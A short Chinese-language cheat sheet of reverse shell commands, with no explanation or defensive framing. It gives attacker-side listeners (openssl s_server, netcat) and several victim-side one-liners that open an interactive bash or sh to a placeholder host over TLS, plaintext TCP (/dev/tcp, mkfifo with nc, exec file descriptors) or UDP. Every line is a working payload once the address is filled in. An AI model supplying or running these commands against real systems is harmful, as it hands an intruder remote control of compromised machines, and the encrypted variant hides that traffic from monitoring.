加密Tcp反向
攻击机:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
目标机:
mkfifo /tmp/ssl; /bin/bash -i < /tmp/ssl 2>&1 | openssl s_client -quiet -connect XX:80> /tmp/ssl; rm /tmp/ssl
rm -fr /tmp/ssl
明文Tcp反向
攻击机:
nc -lkvvp 80
目标机:
/bin/bash -i >& /dev/tcp/XX/80 >&1
或
rm /tmp/sock;mkfifo /tmp/sock;cat /tmp/sock|/bin/bash -i 2>&1|nc XX 80 >/tmp/sock
rm -fr /tmp/sock
或
exec 5<>/dev/tcp/XX/80;cat <&5 | while read line; do $line 2>&5 >&5; done
明文Udp反向
攻击机:
nc -u -lvvp 80
目标机:
/bin/sh -i >& /dev/udp/XXXX/80 0>&1